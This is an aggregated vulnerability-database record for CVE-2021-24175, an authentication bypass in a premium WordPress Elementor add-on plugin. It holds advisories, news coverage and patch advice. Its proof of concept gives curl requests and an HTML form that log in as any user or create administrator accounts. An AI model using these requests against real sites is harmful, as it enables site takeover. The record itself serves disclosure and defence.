The plugin was being actively exploited to by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin. These issues can be exploited even if registration is disabled, and the Login widget is not active. The vendor was notified by the two reporters: \- On March 6th, 2021 by Seravo, which was answered on March 7th, and the vulnerability acknowledged on March 9th. \- On March 7th and 8th 2021 by WP Charged who saw the attacks start on March 5th, 2021. We (WPScanTeam) escalated to issues to Envato on Match 8th, 2021 after confirming them and finding another similar authbypass issue. The free version of the plugin on the WordPress repository did not seem affected by this issue.
{"id": "WPEX-ID:C311FEEF-7041-4C21-9525-132B9BD32F89", "type": "wpexploit", "bulletinFamily": "exploit", "title": "The Plus Addons for Elementor Page Builder < 4.1.7 - Authentication Bypass", "description": "The plugin was being actively exploited to by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin. These issues can be exploited even if registration is disabled, and the Login widget is not active. The vendor was notified by the two reporters: \\- On March 6th, 2021 by Seravo, which was answered on March 7th, and the vulnerability acknowledged on March 9th. \\- On March 7th and 8th 2021 by WP Charged who saw the attacks start on March 5th, 2021. We (WPScanTeam) escalated to issues to Envato on Match 8th, 2021 after confirming them and finding another similar authbypass issue. The free version of the plugin on the WordPress repository did not seem affected by this issue.\n", "published": "2021-03-08T00:00:00", "modified": "2021-04-03T09:53:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Ville Korhonen (Seravo), Antony Booker (WP Charged)", "references": ["https://www.wordfence.com/blog/2021/03/critical-0-day-in-the-plus-addons-for-elementor-allows-site-takeover/", "https://posimyth.ticksy.com/ticket/2713734/"], "cvelist": ["CVE-2021-24175"], "immutableFields": [], "lastseen": "2021-04-12T11:32:19", "viewCount": 382, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:51B6F576-3F28-4977-82BF-F5BC5E6CC416"]}, {"type": "cve", "idList": ["CVE-2021-24175"]}, {"type": "seebug", "idList": ["SSV:99153"]}, {"type": "threatpost", "idList": ["THREATPOST:059ED7CDE9826DBE7FAE383816F90925"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:C311FEEF-7041-4C21-9525-132B9BD32F89"]}], "rev": 4}, "score": {"value": 5.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:51B6F576-3F28-4977-82BF-F5BC5E6CC416"]}, {"type": "cve", "idList": ["CVE-2021-24175"]}, {"type": "seebug", "idList": ["SSV:99153"]}, {"type": "threatpost", "idList": ["THREATPOST:059ED7CDE9826DBE7FAE383816F90925"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:C311FEEF-7041-4C21-9525-132B9BD32F89"]}]}, "exploitation": null, "vulnersScore": 5.5}, "sourceData": "The \"theplus_ajax_login\" and \"theplus_google_ajax_register\" AJAX actions, available to unauthenticated users allow trivial authentication bypass as any user by only providing the related username\r\n\r\ncurl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php\r\ncurl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php\r\n\r\nThen, the \"theplus_google_ajax_register\" AJAX action can also allow any unauthenticated user to create accounts with arbitrary role, such as admin, and then get logged in automatically\r\n\r\n<form method=\"POST\" action=\"https://example.com/wp-admin/admin-ajax.php\">\r\n<input value=\"newadmin\" name=\"name\" type=\"text\">\r\n<input value=\"test@example.com\" name=\"email\" type=\"text\">\r\n<input value=\"test\" name=\"password\" type=\"text\">\r\n<input value=\"theplus_google_ajax_register\" name=\"action\" type=\"text\">\r\n<input value=\"administrator\" name=\"tp_user_reg_role\" type=\"text\">\r\n<input value=\"any\" name=\"nonce\" type=\"text\">\r\n<input type=\"submit\" />\r\n</form>\r\n\r\nFinally, the \"theplus_ajax_register\" AJAX action can also allow unauthenticated user to create accounts with arbitrary role, such as admin, however this require the registration to be enabled, and the Login widget to be used.", "generation": 1, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645814087}}
{"threatpost": [{"lastseen": "2021-03-10T20:35:00", "description": "The Plus Addons for Elementor plugin for WordPress has a critical security vulnerability that attackers can exploit to quickly, easily and remotely take over a website. First reported as a zero-day bug, researchers said it\u2019s being actively attacked in the wild.\n\nThe plugin, which has more than [30,000 active installations](<https://theplusaddons.com/>) according to its developer, allows site owners to create various user-facing widgets for their websites, including user logins and registration forms that can be added to an Elementor page. Elementor is a site-building tool for WordPress.\n\nThe bug (CVE-2021-24175) is a privilege-escalation and authentication-bypass issue that exists in this registration form function of the Plus Addons for Elementor. It rates 9.8 on the CVSS vulnerability scale, making it critical in severity.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cUnfortunately, this functionality was improperly configured and allowed attackers to register as an administrative user, or to log in as an existing administrative user,\u201d according to researchers at Wordfence, [in a posting](<https://www.wordfence.com/blog/2021/03/critical-0-day-in-the-plus-addons-for-elementor-allows-site-takeover/>) this week. They added that it arises from broken session management, but didn\u2019t provide further technical details.\n\n## Exploited as a Zero-Day Bug\n\nThe bug was first [reported to WPScan](<https://wpscan.com/vulnerability/c311feef-7041-4c21-9525-132b9bd32f89?__cf_chl_jschl_tk__=ec28e8a4f8fe37914316167d271861934062bb23-1615404898-0-AYaSxdWbcsd7306BlOBQW2-M0-8votr9xP1w6ZyWxrD972XOy_vz65QZ1omEHlky0kfPd1XotRla_ObNaEJbuKfJHajX81cOOEd-fatHUltblYTkfSkfBXOR1MCggkjhk1RsyZqqvEJg-sur0wGRVinhXRMGxCJ591nPXjM2kof4gpHWOdVyN2lyntep9rrh-TKwYxgTAiLV2gBG9ZXQY3M8_eQakjNY36raLrroDsBNqRaWGmnCTF9DXORUr7zC8EnkDWDPOubIf1qIn6j-daMph5DQL4tcVcv1d_-_OoFnqh9CBTV-BYz-Zx7neV8EALxOfdNnwtH2vO6_WN_Rwrk6tUf9OjRK7bK5Mh6gHei-LZ9jNonq9yNtqO1zXgBMP_s79VVx7cfryu3zufECoYywdJe18q0dJEAMpmy0M7vD7nLFnYe5wqbOf6ax51VI7Q>) by Seravo, a web-hosting company, as a zero-day under active attack by cybercriminals.\n\n\u201cThe plugin is being actively exploited to by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin,\u201d according to WPScan\u2019s overview.\n\nAs for how cybercriminals are using the exploit in the wild, Wordfence noted that indicators of compromise point to attackers creating privileged accounts and then using them to further compromise the site.\n\n\u201cWe believe that attackers are adding user accounts with usernames as the registered email address based on how the vulnerability creates user accounts, and in some cases installing a malicious plugin labeled \u2018wpstaff,'\u201d researchers said.\n\nWorryingly, they added that the vulnerability can still be exploited even if there\u2019s no active login or registration page that was created with the plugin, and even if registration and logins are suspended or disabled.\n\n\u201cThis means that any site running this plugin is vulnerable to compromise,\u201d according to the Wordfence posting.\n\n## **How to Fix the Plus Addons for Elementor Security Vulnerability**\n\nThe vulnerability was reported on Monday, and fully patched a day later. Site admins should upgrade to version 4.1.7 of The Plus Addons for Elementor to avoid compromise, and they should check for \u201cany unexpected administrative users or plugins you did not install,\u201d according to Wordfence. The Plus Addons for Elementor Lite does not contain the same vulnerability, the firm added.\n\n\u201cIf you are using The Plus Addons for Elementor plugin, we strongly recommend that you deactivate and remove the plugin completely until this vulnerability is patched,\u201d researchers said. \u201cIf the free version will suffice for your needs, you can switch to that version for the time being.\u201d\n\n## **WordPress Plugin Problems Persist**\n\nWordPress plugins continue to offer an attractive avenue of attack for cybercriminals.\n\nIn January,[ researchers warned of two vulnerabilities](<https://threatpost.com/orbit-fox-wordpress-plugin-bugs/163020/>) (one critical) in a WordPress plugin called Orbit Fox that could allow attackers to inject malicious code into vulnerable websites and/or take control of a website.\n\nAlso that month, a plugin called PopUp Builder, used by WordPress websites for building pop-up ads for newsletter subscriptions, [was found to have a vulnerability](<https://threatpost.com/wordpress-pop-up-builder-plugin-flaw-plagues-200k-sites/163500/>) could be exploited by attackers to send out newsletters with custom content, or to delete or import newsletter subscribers.\n\nAnd in February, an unpatched, stored cross-site scripting (XSS) security bug [was found to](<https://threatpost.com/unpatched-wordpress-plugin-code-injection/163706/>) potentially affect 50,000 Contact Form 7 Style plugin users.\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-10T20:25:47", "type": "threatpost", "title": "Cyberattackers Exploiting Critical WordPress Plugin Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-24175"], "modified": "2021-03-10T20:25:47", "id": "THREATPOST:059ED7CDE9826DBE7FAE383816F90925", "href": "https://threatpost.com/cyberattackers-exploiting-critical-wordpress-plugin-bug/164663/", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2021-07-24T16:15:00", "description": "", "cvss3": {}, "published": "2021-03-10T00:00:00", "type": "seebug", "title": "WordPress The Plus Addons for Elementor\u63d2\u4ef6\u8eab\u4efd\u9a8c\u8bc1\u7ed5\u8fc7\u6f0f\u6d1e\uff08CVE-2021-24175\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24175"], "modified": "2021-03-10T00:00:00", "id": "SSV:99153", "href": "https://www.seebug.org/vuldb/ssvid-99153", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-06-21T08:02:55", "description": "The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.7 was being actively exploited to by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin. These issues can be exploited even if registration is disabled, and the Login widget is not active.\n\n \n**Recent assessments:** \n \n**dorpor412** at March 10, 2021 8:27am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-24175", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24175"], "modified": "2021-04-10T00:00:00", "id": "AKB:51B6F576-3F28-4977-82BF-F5BC5E6CC416", "href": "https://attackerkb.com/topics/6VgynJ2CM2/cve-2021-24175", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "patchstack": [{"lastseen": "2022-06-01T19:33:11", "description": "Privilege Escalation vulnerability found by Ville Korhonen in WordPress The Plus Addons for Elementor premium plugin (versions <= 4.1.6).\n\n## Solution\n\n\r\n Update the WordPress The Plus Addons for Elementor premium plugin to the latest available version (at least 4.1.7)\r\n ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T00:00:00", "type": "patchstack", "title": "WordPress The Plus Addons for Elementor premium plugin <= 4.1.6 - Privilege Escalation vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24175"], "modified": "2021-03-08T00:00:00", "id": "PATCHSTACK:DCA51209E4283F955EAF8E233CE08547", "href": "https://patchstack.com/database/vulnerability/theplus-elementor-addon/wordpress-the-plus-addons-for-elementor-premium-plugin-4-1-6-privilege-escalation-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-04-12T11:32:19", "description": "The plugin was being actively exploited to by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin. These issues can be exploited even if registration is disabled, and the Login widget is not active. The vendor was notified by the two reporters: \\- On March 6th, 2021 by Seravo, which was answered on March 7th, and the vulnerability acknowledged on March 9th. \\- On March 7th and 8th 2021 by WP Charged who saw the attacks start on March 5th, 2021. We (WPScanTeam) escalated to issues to Envato on Match 8th, 2021 after confirming them and finding another similar authbypass issue. The free version of the plugin on the WordPress repository did not seem affected by this issue.\n\n### PoC\n\nThe \"theplus_ajax_login\" and \"theplus_google_ajax_register\" AJAX actions, available to unauthenticated users allow trivial authentication bypass as any user by only providing the related username curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php curl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php Then, the \"theplus_google_ajax_register\" AJAX action can also allow any unauthenticated user to create accounts with arbitrary role, such as admin, and then get logged in automatically Finally, the \"theplus_ajax_register\" AJAX action can also allow unauthenticated user to create accounts with arbitrary role, such as admin, however this require the registration to be enabled, and the Login widget to be used.\n", "cvss3": {}, "published": "2021-03-08T00:00:00", "type": "wpvulndb", "title": "The Plus Addons for Elementor Page Builder < 4.1.7 - Authentication Bypass", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24175"], "modified": "2021-04-03T09:53:00", "id": "WPVDB-ID:C311FEEF-7041-4C21-9525-132B9BD32F89", "href": "https://wpscan.com/vulnerability/c311feef-7041-4c21-9525-132b9bd32f89", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T14:48:38", "description": "The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.7 was being actively exploited to by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin. These issues can be exploited even if registration is disabled, and the Login widget is not active.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-05T19:15:00", "type": "cve", "title": "CVE-2021-24175", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24175"], "modified": "2021-04-09T17:22:00", "cpe": [], "id": "CVE-2021-24175", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24175", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}]}
The Plus Addons for Elementor Page Builder < 4.1.7 - Authentication Bypass
